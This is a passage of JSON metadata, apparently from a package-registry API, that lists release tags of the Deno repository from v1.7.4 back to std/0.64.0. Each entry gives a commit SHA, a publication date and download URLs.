c8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64